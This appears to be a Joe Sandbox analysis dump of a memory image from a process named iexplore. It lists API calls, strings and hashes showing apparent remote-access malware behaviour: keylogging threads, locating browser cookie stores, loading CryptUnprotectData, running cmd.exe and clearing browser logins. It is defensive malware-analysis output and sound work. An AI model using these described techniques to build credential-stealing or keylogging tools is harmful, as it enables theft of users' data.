                • Part of subcall function 0040C526: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C559
              • PathFileExistsW.SHLWAPI(00000000), ref: 0040C6EC
              • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C757
              Strings
              • User Data\Default\Network\Cookies, xrefs: 0040C6D2
              • User Data\Profile ?\Network\Cookies, xrefs: 0040C704
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: ExistsFilePath
              • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
              • API String ID: 1174141254-1980882731
              • Opcode ID: cddf59ed0f0a35ae698fc10c37901bb26126bcec9028eb75e0275fc853fc9b73
              • Instruction ID: 83f6a23093d6b0727a30a1d550f3d6f5bdb2bb72864fa742cd8a9fd6423befd9
              • Opcode Fuzzy Hash: cddf59ed0f0a35ae698fc10c37901bb26126bcec9028eb75e0275fc853fc9b73
              • Instruction Fuzzy Hash: AE21D37190011AD6CB05F7A2DC96CEEB778EE50719B50013FF502B31D2EF789A46C698
              APIs
              • CreateThread.KERNEL32(00000000,00000000,0040A27D,?,00000000,00000000), ref: 0040A1FE
              • CreateThread.KERNEL32(00000000,00000000,0040A267,?,00000000,00000000), ref: 0040A20E
              • CreateThread.KERNEL32(00000000,00000000,0040A289,?,00000000,00000000), ref: 0040A21A
                • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040B172
                • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: CreateThread$LocalTimewsprintf
              • String ID: Offline Keylogger Started
              • API String ID: 465354869-4114347211
              • Opcode ID: 052d9f24e9ed53101c9c6e29893d10a0ebf43ddb848004275c2ad0d2f900b3d6
              • Instruction ID: bcf1cfbdc14a627f6781ea3a40f7cea6448602225ce5b2be95dc640702f6c2bd
              • Opcode Fuzzy Hash: 052d9f24e9ed53101c9c6e29893d10a0ebf43ddb848004275c2ad0d2f900b3d6
              • Instruction Fuzzy Hash: DE1194B12003187AD220B7369C86CBB765DDA8139CB00057FF946222D2EA795D54CAFB
              APIs
                • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040B172
                • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
              • CreateThread.KERNEL32(00000000,00000000,Function_0000A267,?,00000000,00000000), ref: 0040AF6E
              • CreateThread.KERNEL32(00000000,00000000,Function_0000A289,?,00000000,00000000), ref: 0040AF7A
              • CreateThread.KERNEL32(00000000,00000000,0040A295,?,00000000,00000000), ref: 0040AF86
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: CreateThread$LocalTime$wsprintf
              • String ID: Online Keylogger Started
              • API String ID: 112202259-1258561607
              • Opcode ID: 1301e6b876f99197b04564c733fafc78f062806f1783c7b989fb50bec4e70a22
              • Instruction ID: a86b307176fed80e65d2d8085b20e14cf0e56bf63d45b36b749a5edd9f3e52e0
              • Opcode Fuzzy Hash: 1301e6b876f99197b04564c733fafc78f062806f1783c7b989fb50bec4e70a22
              • Instruction Fuzzy Hash: 1401C8A070031939E62076365C87D7F7A5DCA81398F40057FF645362C6D97D1C5586FB
              APIs
              • LoadLibraryA.KERNEL32(crypt32,CryptUnprotectData), ref: 00406A82
              • GetProcAddress.KERNEL32(00000000), ref: 00406A89
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: AddressLibraryLoadProc
              • String ID: CryptUnprotectData$crypt32
              • API String ID: 2574300362-2380590389
              • Opcode ID: 58a6a211d8528d7034b6d4e537693813dfb36b0b7d2b88ce6c125ece2ab5d6dc
              • Instruction ID: d796ed41fc96dc9ef8d801536240fab0e9422483ab40f89d2a564a4d0f07de08
              • Opcode Fuzzy Hash: 58a6a211d8528d7034b6d4e537693813dfb36b0b7d2b88ce6c125ece2ab5d6dc
              • Instruction Fuzzy Hash: 6201B535B00216ABCB18DFAD9D449ABBBB8EB49300F14817EE95AE3341D674D9008BA4
              APIs
              • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405159), ref: 00405173
              • CloseHandle.KERNEL32(?), ref: 004051CA
              • SetEvent.KERNEL32(?), ref: 004051D9
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: CloseEventHandleObjectSingleWait
              • String ID: Connection Timeout
              • API String ID: 2055531096-499159329
              • Opcode ID: 0fd579d592e0ec80786bd468370273e6dda72da4d01b044bfcfe4f18e9b09a20
              • Instruction ID: e4880b57ed2806ada623013920947221b56867654f576af2420d72dde76e11cf
              • Opcode Fuzzy Hash: 0fd579d592e0ec80786bd468370273e6dda72da4d01b044bfcfe4f18e9b09a20
              • Instruction Fuzzy Hash: 1201D831A40F40AFE7257B368D9552BBBE0FF01302704097FE68396AE2D6789800CF59
              APIs
              • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E833
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: Exception@8Throw
              • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
              • API String ID: 2005118841-1866435925
              • Opcode ID: 14b47bc0c01e13b5246ea87e39f47a408aa5ce0847750dcdb3cc0488a1de7433
              • Instruction ID: aca7d9cae529c24a85643cb8f0975e7fdd15ab88b82278639a3f13e82648cb6f
              • Opcode Fuzzy Hash: 14b47bc0c01e13b5246ea87e39f47a408aa5ce0847750dcdb3cc0488a1de7433
              • Instruction Fuzzy Hash: 2C01B1315443086AE618F693C843FAA73585B10708F108C2FAA15761C2F67D6961C66B
              APIs
              • RegCreateKeyW.ADVAPI32(80000001,00000000,004752D8), ref: 0041381F
              • RegSetValueExW.ADVAPI32(004752D8,?,00000000,00000001,00000000,00000000,004752F0,?,0040F823,pth_unenc,004752D8), ref: 0041384D
              • RegCloseKey.ADVAPI32(004752D8,?,0040F823,pth_unenc,004752D8), ref: 00413858
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: CloseCreateValue
              • String ID: pth_unenc
              • API String ID: 1818849710-4028850238
              • Opcode ID: 0de8c57798d2a052ed48f9ba6d58c7c81afdedd1aa2e5c5a2a8de63742f16a74
              • Instruction ID: 91b44a8789fefabe47d0aed0b401f4e945a8dec35bb1902c17c37083bf943f80
              • Opcode Fuzzy Hash: 0de8c57798d2a052ed48f9ba6d58c7c81afdedd1aa2e5c5a2a8de63742f16a74
              • Instruction Fuzzy Hash: 83F0C271440218FBDF10AFA1EC45FEE376CEF00B56F10452AF905A61A1E7359F04DA94
              APIs
              • std::_Lockit::_Lockit.LIBCPMT ref: 0040DFB1
              • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040DFF0
                • Part of subcall function 00435640: _Yarn.LIBCPMT ref: 0043565F
                • Part of subcall function 00435640: _Yarn.LIBCPMT ref: 00435683
              • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E016
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
              • String ID: bad locale name
              • API String ID: 3628047217-1405518554
              • Opcode ID: 86f49e18a429e1939de4d1535c8c5fe7fe9a78163a93b43351c768af92284890
              • Instruction ID: c9d4814c50014869750c7e26a4e1a69426a580a77e14145940ab7c7d7e24a8db
              • Opcode Fuzzy Hash: 86f49e18a429e1939de4d1535c8c5fe7fe9a78163a93b43351c768af92284890
              • Instruction Fuzzy Hash: EAF081314006049AC634FA62D863B9AB7B89F14718F504A7FB906228D1EF7CBA1CCA4C
              APIs
              • IsValidLocale.KERNEL32(00000000,JD,00000000,00000001,?,?,00444AEA,?,?,004444CA,?,00000004), ref: 00448B32
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: LocaleValid
              • String ID: @"a/$IsValidLocaleName$JD
              • API String ID: 1901932003-3224703580
              • Opcode ID: 98bf4732c76f9d0cbfb8c103c3b900cf5be1bffc9926f7dc5154a94851103fac
              • Instruction ID: c43517d2c5aad0833927174c53c021eab8a1ac695cd7bc198788f3b2bcf9e263
              • Opcode Fuzzy Hash: 98bf4732c76f9d0cbfb8c103c3b900cf5be1bffc9926f7dc5154a94851103fac
              • Instruction Fuzzy Hash: D6F05230A80308F7DB106B60DC06FAEBF58CB04B52F10017EFD046B291CE786E05929E
              APIs
              • CreateThread.KERNEL32(00000000,00000000,Function_0001D45D,00000000,00000000,00000000), ref: 00416C47
              • ShowWindow.USER32(00000009), ref: 00416C61
              • SetForegroundWindow.USER32 ref: 00416C6D
                • Part of subcall function 0041CD9B: AllocConsole.KERNEL32(00475338), ref: 0041CDA4
                • Part of subcall function 0041CD9B: ShowWindow.USER32(00000000,00000000), ref: 0041CDBD
                • Part of subcall function 0041CD9B: SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CDE2
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: Window$ConsoleShow$AllocCreateForegroundOutputThread
              • String ID: !D@
              • API String ID: 3446828153-604454484
              • Opcode ID: b7364eaafb7a437eec89ed9fb4143899ef50b32a2d873a0c8232afd7958e43d5
              • Instruction ID: c1d0571eb829819ca76672189d51ce116019f2d3a91c4b5ec781e9fa27a10d2f
              • Opcode Fuzzy Hash: b7364eaafb7a437eec89ed9fb4143899ef50b32a2d873a0c8232afd7958e43d5
              • Instruction Fuzzy Hash: 9EF05E70158201EAD720AB62EC45AFA7B69EB54351F00483BF849D14F2DB398C85C69D
              APIs
              • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 00416130
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: ExecuteShell
              • String ID: /C $cmd.exe$open
              • API String ID: 587946157-3896048727
              • Opcode ID: 64774f0173dd2414335a6a01ca4130183aa4f4d30cf83fc1238f67c292a9c67a
              • Instruction ID: 0a18f3537a1213b4b5dca9b82f73c842755a7e35c30cee8a650de64661b344da
              • Opcode Fuzzy Hash: 64774f0173dd2414335a6a01ca4130183aa4f4d30cf83fc1238f67c292a9c67a
              • Instruction Fuzzy Hash: 0DE0C0B0208345AAC705E775CC95CBF73ADAA94749B50483F7142A20E2EF7C9D49C659
              APIs
              • TerminateThread.KERNEL32(0040A27D,00000000,004752F0,pth_unenc,0040D0B8,004752D8,004752F0,?,pth_unenc), ref: 0040B8BB
              • UnhookWindowsHookEx.USER32(004750F0), ref: 0040B8C7
              • TerminateThread.KERNEL32(0040A267,00000000,?,pth_unenc), ref: 0040B8D5
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: TerminateThread$HookUnhookWindows
              • String ID: pth_unenc
              • API String ID: 3123878439-4028850238
              • Opcode ID: 507b53b63eb7c6f10faa5869e7b72cd95082fe0a88c6c54c261be3869f185826
              • Instruction ID: 1c21f009177841ea8acfe7f5b61a435624369701cc7e40c150536a334dec3301
              • Opcode Fuzzy Hash: 507b53b63eb7c6f10faa5869e7b72cd95082fe0a88c6c54c261be3869f185826
              • Instruction Fuzzy Hash: 4AE01272205356EFD7241FA09C988267BEEDA0478A324487EF2C3626B1CA794C10CB5D
              APIs
              • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 00401414
              • GetProcAddress.KERNEL32(00000000), ref: 0040141B
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: AddressHandleModuleProc
              • String ID: GetCursorInfo$User32.dll
              • API String ID: 1646373207-2714051624
              • Opcode ID: 0feee19109755bbb7e48939f97e78712d63acfb534ae43d0cb60b2001d0c131e
              • Instruction ID: 65f79b4a2c2aed896b4012a4b0ac893fb7d0ccba54e760513c8834f3bef68171
              • Opcode Fuzzy Hash: 0feee19109755bbb7e48939f97e78712d63acfb534ae43d0cb60b2001d0c131e
              • Instruction Fuzzy Hash: B4B09B70541740E7CB106BF45C4F9153555B514703B105476B44996151D7B44400C61E
              APIs
              • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014B9
              • GetProcAddress.KERNEL32(00000000), ref: 004014C0
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: AddressLibraryLoadProc
              • String ID: GetLastInputInfo$User32.dll
              • API String ID: 2574300362-1519888992
              • Opcode ID: 6185ad33e38da01c5cedd7fab51ef37947c258832bc82ab0b36b916a7b459740
              • Instruction ID: ea73ef4d1088e939c140d9431744cb36a9dcab52d5ea7f3e4bb33043e5d41cbe
              • Opcode Fuzzy Hash: 6185ad33e38da01c5cedd7fab51ef37947c258832bc82ab0b36b916a7b459740
              • Instruction Fuzzy Hash: 5EB092B45C1700FBCB106FA4AC4E9293AA9A614703B1088ABB845D2162EBB884008F9F
              APIs
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: __alldvrm$_strrchr
              • String ID:
              • API String ID: 1036877536-0
              • Opcode ID: 4f8832beee02cc7ac8349e43431f1a5ed1ce449240751d3aeed044ff3a2741d2
              • Instruction ID: 0200e234d7a66e392568480c50467de0d06b46efb2a76a7ba0b74d69ca9a70f2
              • Opcode Fuzzy Hash: 4f8832beee02cc7ac8349e43431f1a5ed1ce449240751d3aeed044ff3a2741d2
              • Instruction Fuzzy Hash: 57A166319843869FFB21CF58C8817AEBBA1FF25304F1441AFE9859B382C27D8951C75A
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 8d454ba49d51131fc87e61242d4279149af29133b98be3a40794271295c3e434
              • Instruction ID: 497cf8d2f4a88fd96e7f98feeb1d24cd381d204b534fd1f3fd6e485e43360072
              • Opcode Fuzzy Hash: 8d454ba49d51131fc87e61242d4279149af29133b98be3a40794271295c3e434
              • Instruction Fuzzy Hash: EA413871A00704BFF324AF79CD41B5EBBA9EB88710F10862FF105DB681E7B999418788
              APIs
              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00474F50), ref: 00404DB3
              • CreateThread.KERNEL32(00000000,00000000,?,00474EF8,00000000,00000000), ref: 00404DC7
              • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000), ref: 00404DD2
              • CloseHandle.KERNEL32(?,?,00000000), ref: 00404DDB
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: Create$CloseEventHandleObjectSingleThreadWait
              • String ID:
              • API String ID: 3360349984-0
              • Opcode ID: 896836ce6e67791e20d0eed4e42f92f466038b3ea1b67db69a0d6ef4832fab86
              • Instruction ID: 465453d6db43d9529954589ba2efa69a6de0eb64d520c2048147815e962fb190
              • Opcode Fuzzy Hash: 896836ce6e67791e20d0eed4e42f92f466038b3ea1b67db69a0d6ef4832fab86
              • Instruction Fuzzy Hash: 3E4192B1108301AFC714EB62CD55DBFB7EDAFD4314F40093EF992A22E1DB3899098666
              APIs
              Strings
              • Cleared browsers logins and cookies., xrefs: 0040C0F5
              • [Cleared browsers logins and cookies.], xrefs: 0040C0E4
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: Sleep
              • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
              • API String ID: 3472027048-1236744412
              • Opcode ID: f04c9fcfc5d51e830be94f028420677c48269f78a09cd2570410497d2b162b15
              • Instruction ID: fac43f66edf0589ccdcbb227709f1a337e776f7542e83b73a027453bfa593f46
              • Opcode Fuzzy Hash: f04c9fcfc5d51e830be94f028420677c48269f78a09cd2570410497d2b162b15
              • Instruction Fuzzy Hash: 2531C804348380E9D6116BF554567AB7B814E93744F08457FB9C42B3D3D97E4848C7AF
              APIs
                • Part of subcall function 0041C551: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041C561
                • Part of subcall function 0041C551: GetWindowTextLengthW.USER32(00000000), ref: 0041C56A
                • Part of subcall function 0041C551: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041C594
              • Sleep.KERNEL32(000001F4), ref: 0040A573
              • Sleep.KERNEL32(00000064), ref: 0040A5FD
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: Window$SleepText$ForegroundLength
              • String ID: [ $ ]
              • API String ID: 3309952895-93608704
              • Opcode ID: e4ff9062ebc1855ffc8709a41a4aeb88848ac43e96cbaf8abbe5df7ed01e55c0
              • Instruction ID: 97bd403738d1ca0cb59e80c1fc79ee6201ed0cb329172f4776a94889a39aca56
              • Opcode Fuzzy Hash: e4ff9062ebc1855ffc8709a41a4aeb88848ac43e96cbaf8abbe5df7ed01e55c0
              • Instruction Fuzzy Hash: FE119F315043006BC614BB65CC5399F77A8AF50308F40053FF552665E2FF79AA5886DB
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 26aae147e3b4032e8d822610677c8b44980169b964e3a1f9465f38b9cd56633c
              • Instruction ID: 17f232e73e96fb976a24982deb7d35e81c220cd9520ca4ef7e8dcf180de91df6
              • Opcode Fuzzy Hash: 26aae147e3b4032e8d822610677c8b44980169b964e3a1f9465f38b9cd56633c
              • Instruction Fuzzy Hash: 1301F2B36497067EFA202E786CC1F67220CDF41BBEB34032BB574712D1DA68CE404568
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 544fafb264448ea5c1072d449201ab24ccf485d51590c339dd7f80fdded84d3d
              • Instruction ID: 34d970f17befced98e3ca294e9c9a609e5e7bfbb0444a55afbb34e25ce639c56
              • Opcode Fuzzy Hash: 544fafb264448ea5c1072d449201ab24ccf485d51590c339dd7f80fdded84d3d
              • Instruction Fuzzy Hash: 0601A2B26096117EFA111E796CC4E27624CDB81BBF325032BF535612D6DA688E014169
              APIs
              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,0044850D,00000000,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue), ref: 00448598
              • GetLastError.KERNEL32(?,0044850D,00000000,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000,00000364,?,004482E7), ref: 004485A4
              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0044850D,00000000,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000), ref: 004485B2
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: LibraryLoad$ErrorLast
              • String ID:
              • API String ID: 3177248105-0
              • Opcode ID: 03982c6842d6040e15a2f529479e2a2fef9fe475335e7dbaf6b0fa49dfb65394
              • Instruction ID: d5df962f837ff7629ef00c7a8b4dcab40ba3e58d8e4ddb8b40c265455ff02ab4
              • Opcode Fuzzy Hash: 03982c6842d6040e15a2f529479e2a2fef9fe475335e7dbaf6b0fa49dfb65394
              • Instruction Fuzzy Hash: AA012832602322FBD7214B289C4495B7798AB50B61B20053AFD05D3241DF34CD01CAE8
              APIs
              • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A843), ref: 0041C49E
              • GetFileSize.KERNEL32(00000000,00000000), ref: 0041C4B2
              • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041C4D7
              • CloseHandle.KERNEL32(00000000), ref: 0041C4E5
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: File$CloseCreateHandleReadSize
              • String ID:
              • API String ID: 3919263394-0
              • Opcode ID: 3271d486463dfc93c477f1e2c7ad2cd28a4a76e92964f49fc02a4406d9477efd
              • Instruction ID: d938e931a51b81dfe9e25773ede9364464a286a3a3b97e7b856b7b87d8bf29b3
              • Opcode Fuzzy Hash: 3271d486463dfc93c477f1e2c7ad2cd28a4a76e92964f49fc02a4406d9477efd
              • Instruction Fuzzy Hash: 0FF0C2B1245308BFE6101B25ACD4EBB375CEB867A9F00053EF902A22C1CA298C05913A
              APIs
              • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
              • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
              • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C233
              • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C23B
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: CloseHandleOpenProcess
              • String ID:
              • API String ID: 39102293-0
              • Opcode ID: 449f4402ebb840a84195bd3231048093a1951801f3bdb5f0a33f363ac88d28a1
              • Instruction ID: 502f13a9e38f74389cb09c542eced9ec4ef47df168bad581006c654e14f0d55b
              • Opcode Fuzzy Hash: 449f4402ebb840a84195bd3231048093a1951801f3bdb5f0a33f363ac88d28a1
              • Instruction Fuzzy Hash: 53012BB1680315ABD61057D49C89FB7B27CDB84796F0000A7FA04D21D2EF748C818679
              APIs
              • ___BuildCatchObject.LIBVCRUNTIME ref: 0043987A
                • Part of subcall function 00439EB2: ___AdjustPointer.LIBCMT ref: 00439EFC
              • _UnwindNestedFrames.LIBCMT ref: 00439891
              • ___FrameUnwindToState.LIBVCRUNTIME ref: 004398A3
              • CallCatchBlock.LIBVCRUNTIME ref: 004398C7
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
              • String ID:
              • API String ID: 2633735394-0
              • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
              • Instruction ID: dcee73c62e3621a690853eebe59cad03ae51e1002f288686f44977c5109bb855
              • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
              • Instruction Fuzzy Hash: 18011732000109BBCF12AF55CC01EDA3BBAEF9D754F04511AFD5861221C3BAE861DBA5
              APIs
              • GetSystemMetrics.USER32(0000004C), ref: 004193F0
              • GetSystemMetrics.USER32(0000004D), ref: 004193F6
              • GetSystemMetrics.USER32(0000004E), ref: 004193FC
              • GetSystemMetrics.USER32(0000004F), ref: 00419402
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: MetricsSystem
              • String ID:
              • API String ID: 4116985748-0
              • Opcode ID: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
              • Instruction ID: 9a44d86f369c7068fc2c949f9b02ed5542bf43da40f6b7222f807aea32733f55
              • Opcode Fuzzy Hash: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
              • Instruction Fuzzy Hash: DFF0A471B043155BD744EA759C51A6F6BD5EBD4264F10043FF20887281EE78DC468785
              APIs
              • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00438F31
              • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00438F36
              • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00438F3B
                • Part of subcall function 0043A43A: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0043A44B
              • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00438F50
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
              • String ID:
              • API String ID: 1761009282-0
              • Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
              • Instruction ID: 04dbcd9d80b8837b95b31ffc0e846904d80335f120ca5f78e3accc67d081205e
              • Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
